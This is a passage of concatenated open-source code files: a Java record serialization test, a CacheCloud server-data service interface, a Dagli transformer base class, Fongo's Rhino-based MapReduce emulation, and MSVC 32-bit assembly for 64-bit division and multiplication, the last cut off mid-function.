DataRecordWithStats().getMatchingRecordReaderWriter()); } @Test public void object_record_with_stats_matching_reader_writer_id_is_data_record_with_stats_reader_writer_id() { assertEquals(DATA_RECORD_WITH_STATS_READER_WRITER, new ObjectRecordWithStats().getMatchingRecordReaderWriter()); } private ExpiryMetadata newExpiryMetadata() { return new ExpiryMetadataImpl(); } @Test public void written_and_read_data_record_with_stats_are_equal() throws IOException { ExpiryMetadata expiryMetadata = newExpiryMetadata(); Record<Data> writtenRecord = populateAndGetRecord(new DataRecordWithStats(), expiryMetadata); Record<Data> readRecord = writeReadAndGet(writtenRecord, writtenRecord.getValue(), expiryMetadata); assertEquals(writtenRecord, readRecord); } @Test public void written_and_read_object_record_with_stats_are_equal() throws IOException { ExpiryMetadata expiryMetadata = newExpiryMetadata(); Record writtenRecord = populateAndGetRecord(new ObjectRecordWithStats(), expiryMetadata); Data dataValue = ss.toData(writtenRecord.getValue()); Record<Data> readRecord = writeReadAndGet(writtenRecord, dataValue, expiryMetadata); assertEquals(asDataRecordWithStats(writtenRecord, dataValue), readRecord); } private Record populateAndGetRecord(Record writtenRecord, ExpiryMetadata expiryMetadata) { writtenRecord.setVersion(3); 
writtenRecord.setLastUpdateTime(4); writtenRecord.setLastAccessTime(5); writtenRecord.setLastStoredTime(6); writtenRecord.setCreationTime(8); writtenRecord.setVersion(9); writtenRecord.setHits(10); writtenRecord.setValue(ss.toData(11)); expiryMetadata.setTtl(1); expiryMetadata.setMaxIdle(2); expiryMetadata.setExpirationTime(7); return writtenRecord; } private Record writeReadAndGet(Record expectedRecord, Data dataValue, ExpiryMetadata expiryMetadata) throws IOException { ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ObjectDataOutputStream out = new ObjectDataOutputStream(outputStream, ss); Records.writeRecord(out, expectedRecord, dataValue); ObjectDataInputStream in = new ObjectDataInputStream(new ByteArrayInputStream(outputStream.toByteArray()), ss); return Records.readRecord(in); } private static Record<Data> asDataRecordWithStats(Record fromRecord, Data value) { DataRecordWithStats toRecord = new DataRecordWithStats(value); toRecord.setValue(value); return copyMetadata(fromRecord, toRecord); } private static Record copyMetadata(Record fromRecord, Record toRecord) { toRecord.setHits(fromRecord.getHits()); toRecord.setVersion(fromRecord.getVersion()); toRecord.setCreationTime(fromRecord.getCreationTime()); toRecord.setLastAccessTime(fromRecord.getLastAccessTime()); toRecord.setLastStoredTime(fromRecord.getLastStoredTime()); toRecord.setLastUpdateTime(fromRecord.getLastUpdateTime()); return toRecord; } }
1,844
6,497
<reponame>JokerQueue/cachecloud
package com.sohu.cache.web.service;

import java.util.List;

import com.sohu.cache.entity.ServerInfo;
import com.sohu.cache.entity.ServerStatus;
import com.sohu.cache.server.data.Server;

public interface ServerDataService {

    /**
     * Query basic information of a server.
     * @param ip
     * @return @ServerInfo
     */
    public ServerInfo queryServerInfo(String ip);

    /**
     * Get system information for all servers.
     * @return
     */
    public List<ServerInfo> getAllServerInfo();

    /**
     * Save the server's distribution information.
     * @param ip
     * @param dist from /etc/issue
     */
    public void saveServerInfo(String ip, String dist);

    /**
     * Save or update server information.
     * @param server
     * @return the number of affected rows
     */
    public Integer saveAndUpdateServerInfo(Server server);

    /**
     * Query server status.
     * @param ip
     * @param date
     * @return List<ServerStatus>
     */
    public List<ServerStatus> queryServerStatus(String ip, String date);

    /**
     * Query server overview status.
     * @param ip
     * @param date
     * @return List<ServerStatus>
     */
    public List<ServerStatus> queryServerOverview(String ip, String date);

    /**
     * Query server CPU status.
     * @param ip
     * @param date
     * @return List<ServerStatus>
     */
    public List<ServerStatus> queryServerCpu(String ip, String date);

    /**
     * Query server network status.
     * @param ip
     * @param date
     * @return List<ServerStatus>
     */
    public List<ServerStatus> queryServerNet(String ip, String date);

    /**
     * Query server disk status.
     * @param ip
     * @param date
     * @return List<ServerStatus>
     */
    public List<ServerStatus> queryServerDisk(String ip, String date);

    /**
     * Save server status.
     */
    public void saveServerStat(Server server);
}
784
364
<gh_stars>100-1000 package com.linkedin.dagli.transformer; import com.linkedin.dagli.annotation.equality.IgnoredByValueEquality; import com.linkedin.dagli.producer.Producer; import com.linkedin.dagli.transformer.internal.TransformerDynamicInternalAPI; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; /** * Base class for dynamic-arity transformers. Note that derived transformer implementations should not extend this * class directly. Instead, extend the base class corresponding to the type (prepared/preparable) of the transformer * you're creating, e.g. {@link AbstractPreparedTransformerDynamic}. * * @param <R> the type of value produced by this transformer * @param <I> the type of the internal API object used by this transformer * @param <S> the ultimate derived type of the transformer extending this class */ @IgnoredByValueEquality abstract class AbstractTransformerDynamic<R, I extends TransformerDynamicInternalAPI<R, S>, S extends AbstractTransformerDynamic<R, I, S>> extends AbstractTransformer<R, I, S> implements TransformerDynamic<R> { private static final long serialVersionUID = 1; protected List<Producer<?>> _inputs; /** * Creates a new transformer with no inputs. */ public AbstractTransformerDynamic() { this(Collections.emptyList()); } /** * Creates a new transformer with the specified inputs. * * @param inputs the inputs for the transformer */ public AbstractTransformerDynamic(Producer<?>... inputs) { this(Arrays.asList(inputs)); } /** * Creates a new transformer with the specified inputs. * * @param inputs the inputs for the transformer */ public AbstractTransformerDynamic(List<? extends Producer<?>> inputs) { _inputs = new ArrayList<>(inputs); } /** * Gets a list of all the inputs to this transformer. * * @return a list of the transformer's inputs */ @Override protected List<? extends Producer<?>> getInputList() { return _inputs; } /** * Creates a new transformer that uses the specified inputs but is otherwise a copy of this one. * * The returned instance <strong>must</strong> be a new instance, as Dagli may rely on this invariant. * * It is "unsafe" because the inputs provided are not (necessarily) type-checked, even at runtime, which may result * in logic bugs. * * @param newInputs the new inputs that will be used by the copy of the transformer * @return a copy of the transformer that uses the specified inputs */ protected S withInputsUnsafe(List<? extends Producer<?>> newInputs) { return clone(r -> r._inputs = new ArrayList<>(newInputs)); } protected abstract class InternalAPI extends AbstractTransformer<R, I, S>.InternalAPI implements TransformerDynamicInternalAPI<R, S> { } }
830
492
package com.github.fakemongo.impl; import com.github.fakemongo.Fongo; import com.mongodb.*; import com.mongodb.operation.MapReduceStatistics; import com.mongodb.util.FongoJSON; import com.mongodb.util.ObjectSerializer; import org.mozilla.javascript.*; import org.mozilla.javascript.tools.shell.Global; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.lang.reflect.InvocationTargetException; import java.util.*; /** * http://docs.mongodb.org/manual/reference/method/db.collection.mapReduce/ * <p/> * TODO : finalize. */ public class MapReduce { private static final Logger LOG = LoggerFactory.getLogger(MapReduce.class); private final FongoDB fongoDB; private final FongoDBCollection fongoDBCollection; private final String map; private final String reduce; // TODO private final String finalize; private final Map<String, Object> scope; private final DBObject out; private final DBObject query; private final DBObject sort; private final int limit; // http://docs.mongodb.org/manual/reference/method/db.collection.mapReduce/ private enum Outmode { REPLACE { @Override public void initCollection(DBCollection coll) { // Must replace all. coll.remove(new BasicDBObject()); } @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { coll.insert(results); } }, MERGE { @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { // Upsert == insert the result if not exist. for (DBObject result : results) { coll.update(new BasicDBObject(FongoDBCollection.ID_FIELD_NAME, result.get(FongoDBCollection.ID_FIELD_NAME)), result, true, false); } } }, REDUCE { @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { final List<DBObject> reduced = mr.reduceOutputStage(coll, results); for (DBObject result : reduced) { coll.update(new BasicDBObject(FongoDBCollection.ID_FIELD_NAME, result.get(FongoDBCollection.ID_FIELD_NAME)), result, true, false); } } }, INLINE { @Override public void initCollection(DBCollection coll) { // Must replace all. coll.remove(new BasicDBObject()); } @Override public void newResults(MapReduce mr, DBCollection coll, List<DBObject> results) { coll.insert(results); } @Override public String collectionName(DBObject object) { // Random uuid for extract result after. return UUID.randomUUID().toString(); } @Override public MapReduceOutput createResult(DBObject query, final DBCollection coll, final MapReduceStatistics ignored) { return new FongoMapReduceOutput(query, coll.find().toArray()); } }; public static Outmode valueFor(DBObject object) { for (Outmode outmode : values()) { if (object.containsField(outmode.name().toLowerCase())) { return outmode; } } return null; } public static Outmode valueFor(MapReduceCommand.OutputType outputType) { for (Outmode outmode : values()) { if (outputType.name().equalsIgnoreCase(outmode.name().toLowerCase())) { return outmode; } } return null; } public String collectionName(DBObject object) { return (String) object.get(name().toLowerCase()); } public void initCollection(DBCollection coll) { // Do nothing. 
} public abstract void newResults(MapReduce mapReduce, DBCollection coll, List<DBObject> results); public MapReduceOutput createResult(final DBObject query, final DBCollection coll, final MapReduceStatistics mapReduceStatistics) { return new FongoMapReduceOutput(query, coll, mapReduceStatistics); } } public MapReduce(Fongo fongo, FongoDBCollection coll, String map, String reduce, String finalize, Map<String, Object> scope, DBObject out, DBObject query, DBObject sort, Number limit) { if (out.containsField("db")) { this.fongoDB = fongo.getDB((String) out.get("db")); } else { this.fongoDB = (FongoDB) coll.getDB(); } this.fongoDBCollection = coll; this.map = map; this.reduce = reduce; this.finalize = finalize; this.scope = scope; this.out = out; this.query = query; this.sort = sort; this.limit = limit == null ? 0 : limit.intValue(); } /** * @return null if error. */ public MapReduceOutput computeResult() { final long startTime = System.currentTimeMillis(); // Replace, merge or reduce ? Outmode outmode = Outmode.valueFor(out); DBCollection coll = fongoDB.getCollection(outmode.collectionName(out)); // Mode replace. outmode.initCollection(coll); final MapReduceResult mapReduceResult = runInContext(); outmode.newResults(this, coll, mapReduceResult.result); final MapReduceStatistics mapReduceStatistics = new MapReduceStatistics(mapReduceResult.inputCount, mapReduceResult.outputCount, mapReduceResult.emitCount, (int) (System.currentTimeMillis() - startTime)); final MapReduceOutput result = outmode.createResult(this.query, coll, mapReduceStatistics); LOG.debug("computeResult() : {}", result); return result; } static class MapReduceResult { final int inputCount, outputCount, emitCount; final List<DBObject> result; public MapReduceResult(int inputCount, int outputCount, int emitCount, List<DBObject> result) { this.inputCount = inputCount; this.outputCount = outputCount; this.emitCount = emitCount; this.result = result; } } private MapReduceResult runInContext() { // TODO use Compilable ? http://www.jmdoudoux.fr/java/dej/chap-scripting.htm Context cx = Context.enter(); try { Scriptable scriptable = new Global(cx);//cx.initStandardObjects(); cx.initStandardObjects(); ScriptableObject.defineClass(scriptable, FongoNumberLong.class); ScriptableObject.defineClass(scriptable, FongoNumberInt.class); // cx.setGeneratingDebug(true); // cx.getWrapFactory().setJavaPrimitiveWrap(false); final StringBuilder stringBuilder = new StringBuilder(); // Add some function to javascript engine. this.addMongoFunctions(stringBuilder); this.addScopeObjects(stringBuilder); final List<String> javascriptFunctions = new ArrayList<String>(); javascriptFunctions.add(stringBuilder.toString()); final List<DBObject> objects = this.fongoDBCollection.find(query).sort(sort).limit(limit).toArray(); constructJavascriptFunction(javascriptFunctions, objects); for (String jsFunction : javascriptFunctions) { try { cx.evaluateString(scriptable, jsFunction, "MapReduce", 0, null); } catch (RhinoException e) { LOG.error("Exception running script {}", jsFunction, e); if (e.getMessage().contains("FongoAssertException")) { fongoDB.notOkErrorResult(16722, "Error: assert failed: " + e.getMessage()).throwOnError(); } fongoDB.notOkErrorResult(16722, "JavaScript execution failed: " + e.getMessage()).throwOnError(); } } // Get the result into an object. 
final NativeArray outs = (NativeArray) scriptable.get("$$$fongoOuts$$$", scriptable); final List<DBObject> dbOuts = new ArrayList<DBObject>(); for (int i = 0; i < outs.getLength(); i++) { final NativeObject out = (NativeObject) outs.get(i, outs); dbOuts.add(getObject(out)); } // TODO : verify emitCount return new MapReduceResult(objects.size(), dbOuts.size(), objects.size(), dbOuts); } catch (IllegalAccessException e) { throw new RuntimeException(e); } catch (InstantiationException e) { throw new RuntimeException(e); } catch (InvocationTargetException e) { throw new RuntimeException(e); } finally { Context.exit(); } } private void addScopeObjects(StringBuilder stringBuilder) { if (this.scope != null) { for (Map.Entry<String, Object> entry : this.scope.entrySet()) { stringBuilder.append("var ").append(entry.getKey()).append(" = "); FongoJSON.serialize(entry.getValue(), stringBuilder, OBJECT_SERIALIZERS); stringBuilder.append(";\n"); } } } private List<DBObject> reduceOutputStage(DBCollection coll, List<DBObject> mapReduceOutput) { Context cx = Context.enter(); try { final Scriptable scope = cx.initStandardObjects(); final List<String> jsFunctions = constructReduceOutputStageJavascriptFunction(coll, mapReduceOutput); for (String jsFunction : jsFunctions) { try { cx.evaluateString(scope, jsFunction, "<reduce output stage>", 0, null); } catch (RhinoException e) { LOG.error("Exception running script {}", jsFunction, e); if (e.getMessage().contains("FongoAssertException")) { fongoDB.notOkErrorResult(16722, "Error: assert failed: " + e.getMessage()).throwOnError(); } fongoDB.notOkErrorResult(16722, "JavaScript execution failed: " + e.getMessage()).throwOnError(); } } // Get the result into an object. NativeArray outs = (NativeArray) scope.get("$$$fongoOuts$$$", scope); List<DBObject> dbOuts = new ArrayList<DBObject>(); for (int i = 0; i < outs.getLength(); i++) { NativeObject out = (NativeObject) outs.get(i, outs); dbOuts.add(getObject(out)); } LOG.debug("reduceOutputStage() : {}", dbOuts); return dbOuts; } finally { Context.exit(); } } DBObject getObject(ScriptableObject no) { if (no instanceof NativeArray) { BasicDBList ret = new BasicDBList(); NativeArray noArray = (NativeArray) no; for (int i = 0; i < noArray.getLength(); i++) { Object value = noArray.get(i, noArray); value = getObjectOrTransform(value); ret.add(value); } return ret; } DBObject ret = new BasicDBObject(); Object[] propIds = no.getIds(); for (Object propId : propIds) { String key = Context.toString(propId); Object value = NativeObject.getProperty(no, key); value = getObjectOrTransform(value); ret.put(key, value); } return ret; } private Object getObjectOrTransform(Object value) { if (value instanceof NativeObject || value instanceof NativeArray) { value = getObject((ScriptableObject) value); } if (value instanceof Integer) { value = ((Integer) value).doubleValue(); } if (value instanceof ConsString) { value = value.toString(); } if (value instanceof NativeJavaObject) { value = ((NativeJavaObject) value).unwrap(); } if (value instanceof FongoNumberLong) { value = ((FongoNumberLong) value).value; } if (value instanceof FongoNumberInt) { value = ((FongoNumberInt) value).value; } return value; } /** * Create the map/reduce/finalize function. */ private List<String> constructJavascriptFunction(List<String> result, List<DBObject> objects) { StringBuilder sb = new StringBuilder(80000); // Create variables for exporting. 
sb.append("var $$$fongoEmits$$$ = new Object();\n"); sb.append("function emit(param1, param2) {\n" + "var toSource = param1.toSource();\n" + "if(typeof $$$fongoEmits$$$[toSource] === 'undefined') {\n " + "$$$fongoEmits$$$[toSource] = new Array();\n" + "}\n" + "var val = {id: param1, value: param2};\n" + "$$$fongoEmits$$$[toSource][$$$fongoEmits$$$[toSource].length] = val;\n" + "};\n"); // Prepare map function. sb.append("var fongoMapFunction = ").append(map).append(";\n"); sb.append("var $$$fongoVars$$$ = new Object();\n"); // For each object, execute in javascript the function. for (DBObject object : objects) { sb.append("$$$fongoVars$$$ = "); FongoJSON.serialize(object, sb, OBJECT_SERIALIZERS); sb.append(";\n"); sb.append("$$$fongoVars$$$['fongoExecute'] = fongoMapFunction;\n"); sb.append("$$$fongoVars$$$.fongoExecute();\n"); // if (sb.length() > 65535) { // Rhino limit :-( // result.add(sb.toString()); // sb.setLength(0); // } } result.add(sb.toString()); // Add Reduce Function sb.setLength(0); sb.append("var reduce = ").append(reduce).append("\n"); sb.append("var $$$fongoOuts$$$ = Array();\n" + "for(var i in $$$fongoEmits$$$) {\n" + "var elem = $$$fongoEmits$$$[i];\n" + "var values = []; id = null; for (var ii in elem) { values.push(elem[ii].value); id = elem[ii].id;}\n" + "$$$fongoOuts$$$[$$$fongoOuts$$$.length] = { _id : id, value : reduce(id, values) };\n" + "}\n"); result.add(sb.toString()); return result; } /** * Create 'reduce' stage output function. */ private List<String> constructReduceOutputStageJavascriptFunction(DBCollection coll, List<DBObject> objects) { List<String> result = new ArrayList<String>(); StringBuilder sb = new StringBuilder(80000); addMongoFunctions(sb); sb.append("var reduce = ").append(reduce).append("\n"); sb.append("var $$$fongoOuts$$$ = new Array();\n"); for (DBObject object : objects) { String objectJson = FongoJSON.serialize(object); String objectValueJson = FongoJSON.serialize(object.get("value")); DBObject existing = coll.findOne(new BasicDBObject().append(FongoDBCollection.ID_FIELD_NAME, object.get(FongoDBCollection.ID_FIELD_NAME))); if (existing == null || existing.get("value") == null) { sb.append("$$$fongoOuts$$$[$$$fongoOuts$$$.length] = ").append(objectJson).append(";\n"); } else { String id = FongoJSON.serialize(object.get(FongoDBCollection.ID_FIELD_NAME)); String existingValueJson = FongoJSON.serialize(existing.get("value")); sb.append("$$$fongoId$$$ = ").append(id).append(";\n"); sb.append("$$$fongoValues$$$ = [ ").append(existingValueJson).append(", ").append(objectValueJson).append("];\n"); sb.append("$$$fongoReduced$$$ = { _id: $$$fongoId$$$, 'value': reduce($$$fongoId$$$, $$$fongoValues$$$)};") .append(";\n"); sb.append("$$$fongoOuts$$$[$$$fongoOuts$$$.length] = $$$fongoReduced$$$;\n"); } if (sb.length() > 65535) { // Rhino limit :-( result.add(sb.toString()); sb.setLength(0); } } result.add(sb.toString()); return result; } private void addMongoFunctions(StringBuilder construct) { // Add some function to javascript engine. 
construct.append("Array.sum = function(array) {\n" + " var a = 0;\n" + " for (var i = 0; i < array.length; i++) {\n" + " a = a + array[i];\n" + " }\n" + " return a;" + "};\n"); construct.append("printjson = function(a) {" + " print(tojson(a));\n" + " };\n"); construct.append("printjsononeline = function(a) {\n" + " print(tojson(a));\n" + " };\n"); construct.append("assert = function(a) {\n" + " if (!a) throw new FongoAssertException();\n" + " };\n"); construct.append("isString = function(a) {\n" + " return typeof(a) === 'string';\n" + " };\n"); construct.append("isNumber = function(a) {\n" + " return typeof(a) === 'number';\n" + " };\n"); construct.append("isObject = function(a) {\n" + " return typeof(a) === 'object';\n" + " };\n"); construct.append("tojson = function(a) {\n" + " return JSON.stringify(a,null,0);\n" + " };\n"); construct.append("tojsononeline = function(a) {\n" + " return JSON.stringify(a,null,0);\n" + " };\n"); construct.append("NumberLong = function(a) {\n" + " return new FongoNumberLong(a);\n" + "};\n"); construct.append("NumberInt = function(a) {\n" + " return new FongoNumberInt(a);\n" + "};\n"); } public static class FongoNumberLong extends ScriptableObject { Long value; public FongoNumberLong() { } // Method jsConstructor defines the JavaScript constructor public void jsConstructor(Double a) { this.value = a.longValue(); } public double jsFunction_toNumber() { return value; } public double jsFunction_valueOf() { return jsFunction_toNumber(); } @Override public String getClassName() { return "FongoNumberLong"; } public String jsFunction_toString() { return "NumberLong(" + this.value + ")"; } } public static class FongoNumberInt extends ScriptableObject { int value; public FongoNumberInt() { } // Method jsConstructor defines the JavaScript constructor public void jsConstructor(int a) { this.value = a; } public int jsFunction_toNumber() { return value; } public int jsFunction_valueOf() { return value; } @Override public String getClassName() { return "FongoNumberInt"; } public String jsFunction_toString() { return "NumberInt(" + this.value + ")"; } } private static class FongoLongSerializer implements ObjectSerializer { @Override public String serialize(final Object obj) { StringBuilder builder = new StringBuilder(); serialize(obj, builder); return builder.toString(); } @Override public void serialize(final Object obj, final StringBuilder buf) { buf.append("NumberLong(").append(obj.toString()).append(")"); } } private static class FongoIntegerSerializer implements ObjectSerializer { @Override public String serialize(final Object obj) { StringBuilder builder = new StringBuilder(); serialize(obj, builder); return builder.toString(); } @Override public void serialize(final Object obj, final StringBuilder buf) { buf.append("NumberInt(").append(obj.toString()).append(")"); } } static final Map<Class<?>, ObjectSerializer> OBJECT_SERIALIZERS = new HashMap<Class<?>, ObjectSerializer>(); static { OBJECT_SERIALIZERS.put(Long.class, new FongoLongSerializer()); OBJECT_SERIALIZERS.put(Integer.class, new FongoIntegerSerializer()); } }
7,352
10,125
/** @file MSVC compiler intrinsics for IA32. Copyright (c) 2020, nms42. All rights reserved. SPDX-License-Identifier: BSD-3-Clause **/ /* Came from https://gist.github.com/mmozeiko/6a365d6c483fc721b63a#file-win32_crt_math-cpp */ #ifdef _M_IX86 // use this file only for 32-bit architecture #define CRT_LOWORD(x) dword ptr [x+0] #define CRT_HIWORD(x) dword ptr [x+4] __declspec(naked) void _alldiv() { #define DVND esp + 16 // stack address of dividend (a) #define DVSR esp + 24 // stack address of divisor (b) __asm { push edi push esi push ebx ; Determine sign of the result (edi = 0 if result is positive, non-zero ; otherwise) and make operands positive. xor edi,edi ; result sign assumed positive mov eax,CRT_HIWORD(DVND) ; hi word of a or eax,eax ; test to see if signed jge short L1 ; skip rest if a is already positive inc edi ; complement result sign flag mov edx,CRT_LOWORD(DVND) ; lo word of a neg eax ; make a positive neg edx sbb eax,0 mov CRT_HIWORD(DVND),eax ; save positive value mov CRT_LOWORD(DVND),edx L1: mov eax,CRT_HIWORD(DVSR) ; hi word of b or eax,eax ; test to see if signed jge short L2 ; skip rest if b is already positive inc edi ; complement the result sign flag mov edx,CRT_LOWORD(DVSR) ; lo word of a neg eax ; make b positive neg edx sbb eax,0 mov CRT_HIWORD(DVSR),eax ; save positive value mov CRT_LOWORD(DVSR),edx L2: ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; ; NOTE - eax currently contains the high order word of DVSR ; or eax,eax ; check to see if divisor < 4194304K jnz short L3 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; eax <- high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; eax <- low order bits of quotient mov edx,ebx ; edx:eax <- quotient jmp short L4 ; set sign, restore stack and return ; ; Here we do it the hard way. Remember, eax contains the high word of DVSR ; L3: mov ebx,eax ; ebx:ecx <- divisor mov ecx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L5: shr ebx,1 ; shift divisor right one bit rcr ecx,1 shr edx,1 ; shift dividend right one bit rcr eax,1 or ebx,ebx jnz short L5 ; loop until divisor < 4194304K div ecx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L6 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. 
; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L6 ; if result > original, do subtract jb short L7 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L7 ; if less or equal we are ok, else subtract L6: dec esi ; subtract 1 from quotient L7: xor edx,edx ; edx:eax <- quotient mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. Set the sign ; according to the save value, cleanup the stack, and return. ; L4: dec edi ; check to see if result is negative jnz short L8 ; if EDI == 0, result should be negative neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Restore the saved registers and return. ; L8: pop ebx pop esi pop edi ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _alldvrm() { #define DVND esp + 16 // stack address of dividend (a) #define DVSR esp + 24 // stack address of divisor (b) __asm { push edi push esi push ebp ; Determine sign of the quotient (edi = 0 if result is positive, non-zero ; otherwise) and make operands positive. ; Sign of the remainder is kept in ebp. xor edi,edi ; result sign assumed positive xor ebp,ebp ; result sign assumed positive mov eax,CRT_HIWORD(DVND) ; hi word of a or eax,eax ; test to see if signed jge short L1 ; skip rest if a is already positive inc edi ; complement result sign flag inc ebp ; complement result sign flag mov edx,CRT_LOWORD(DVND) ; lo word of a neg eax ; make a positive neg edx sbb eax,0 mov CRT_HIWORD(DVND),eax ; save positive value mov CRT_LOWORD(DVND),edx L1: mov eax,CRT_HIWORD(DVSR) ; hi word of b or eax,eax ; test to see if signed jge short L2 ; skip rest if b is already positive inc edi ; complement the result sign flag mov edx,CRT_LOWORD(DVSR) ; lo word of a neg eax ; make b positive neg edx sbb eax,0 mov CRT_HIWORD(DVSR),eax ; save positive value mov CRT_LOWORD(DVSR),edx L2: ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; ; NOTE - eax currently contains the high order word of DVSR ; or eax,eax ; check to see if divisor < 4194304K jnz short L3 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; eax <- high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; eax <- low order bits of quotient mov esi,eax ; ebx:esi <- quotient ; ; Now we need to do a multiply so that we can compute the remainder. ; mov eax,ebx ; set up high word of quotient mul CRT_LOWORD(DVSR) ; CRT_HIWORD(QUOT) * DVSR mov ecx,eax ; save the result in ecx mov eax,esi ; set up low word of quotient mul CRT_LOWORD(DVSR) ; CRT_LOWORD(QUOT) * DVSR add edx,ecx ; EDX:EAX = QUOT * DVSR jmp short L4 ; complete remainder calculation ; ; Here we do it the hard way. 
Remember, eax contains the high word of DVSR ; L3: mov ebx,eax ; ebx:ecx <- divisor mov ecx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L5: shr ebx,1 ; shift divisor right one bit rcr ecx,1 shr edx,1 ; shift dividend right one bit rcr eax,1 or ebx,ebx jnz short L5 ; loop until divisor < 4194304K div ecx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L6 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L6 ; if result > original, do subtract jb short L7 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L7 ; if less or equal we are ok, else subtract L6: dec esi ; subtract 1 from quotient sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L7: xor ebx,ebx ; ebx:esi <- quotient L4: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will do the subtract in the ; opposite direction and negate the result if necessary. ; sub eax,CRT_LOWORD(DVND) ; subtract dividend from result sbb edx,CRT_HIWORD(DVND) ; ; Now check the result sign flag to see if the result is supposed to be positive ; or negative. It is currently negated (because we subtracted in the 'wrong' ; direction), so if the sign flag is set we are done, otherwise we must negate ; the result to make it positive again. ; dec ebp ; check result sign flag jns short L9 ; result is ok, set up the quotient neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Now we need to get the quotient into edx:eax and the remainder into ebx:ecx. ; L9: mov ecx,edx mov edx,ebx mov ebx,ecx mov ecx,eax mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. Set the sign ; according to the save value, cleanup the stack, and return. ; dec edi ; check to see if result is negative jnz short L8 ; if EDI == 0, result should be negative neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Restore the saved registers and return. 
; L8: pop ebp pop esi pop edi ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _allmul() { #define A esp + 8 // stack address of a #define B esp + 16 // stack address of b __asm { push ebx mov eax,CRT_HIWORD(A) mov ecx,CRT_LOWORD(B) mul ecx ;eax has AHI, ecx has BLO, so AHI * BLO mov ebx,eax ;save result mov eax,CRT_LOWORD(A) mul CRT_HIWORD(B) ;ALO * BHI add ebx,eax ;ebx = ((ALO * BHI) + (AHI * BLO)) mov eax,CRT_LOWORD(A) ;ecx = BLO mul ecx ;so edx:eax = ALO*BLO add edx,ebx ;now edx has all the LO*HI stuff pop ebx ret 16 ; callee restores the stack } #undef A #undef B } __declspec(naked) void _allrem() { #define DVND esp + 12 // stack address of dividend (a) #define DVSR esp + 20 // stack address of divisor (b) __asm { push ebx push edi ; Determine sign of the result (edi = 0 if result is positive, non-zero ; otherwise) and make operands positive. xor edi,edi ; result sign assumed positive mov eax,CRT_HIWORD(DVND) ; hi word of a or eax,eax ; test to see if signed jge short L1 ; skip rest if a is already positive inc edi ; complement result sign flag bit mov edx,CRT_LOWORD(DVND) ; lo word of a neg eax ; make a positive neg edx sbb eax,0 mov CRT_HIWORD(DVND),eax ; save positive value mov CRT_LOWORD(DVND),edx L1: mov eax,CRT_HIWORD(DVSR) ; hi word of b or eax,eax ; test to see if signed jge short L2 ; skip rest if b is already positive mov edx,CRT_LOWORD(DVSR) ; lo word of b neg eax ; make b positive neg edx sbb eax,0 mov CRT_HIWORD(DVSR),eax ; save positive value mov CRT_LOWORD(DVSR),edx L2: ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; ; NOTE - eax currently contains the high order word of DVSR ; or eax,eax ; check to see if divisor < 4194304K jnz short L3 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; edx <- remainder mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; edx <- final remainder mov 